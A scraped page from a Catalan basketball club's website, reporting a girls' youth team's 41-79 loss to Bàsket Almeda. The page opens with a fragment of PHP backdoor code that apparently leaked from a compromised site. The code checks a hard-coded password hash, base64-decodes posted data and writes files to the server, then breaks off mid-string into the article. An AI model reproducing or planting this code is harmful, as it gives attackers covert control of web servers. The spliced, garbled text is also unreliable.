function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'Infantil femení 07A és derrotat pel Bàsket Almeda (41-79) - Tgn Bàsquet Club -

L’Infantil femení 07A és derrotat pel Bàsket Almeda (41-79)

Updated: maig 19, 2021

L’Infantil femení 07A es veu superat pel Bàsket Almeda en un matx competit a un alt nivell per part dels dos equips. L’inici va estar molt igualat, acabant els primers 10 minuts amb un marcador de 14-18. Aquest va ser el resultat de la intensitat defensiva amb la que van sortir les locals, que volien refer-se del mal inici en el partit anterior vers les mateixes rivals (71-30).  Malgrat els esforços de les liles, les visitants van pujar les línies defensives i, brillant des de 6,75 transformant en bàsquets fins a 5 triples només en el segon període, marxen al descans amb un marcador decantat cap a les grogues (20-43.

La segona part de l’encontre va seguir el mateix guió que els primers 20 minuts: lluitant el tercer període per a igualar el parcial, però les tarragonines no van poder aguantar el ritme de joc de les visitants i cauen definitivament amb un últim parcial desfavorable.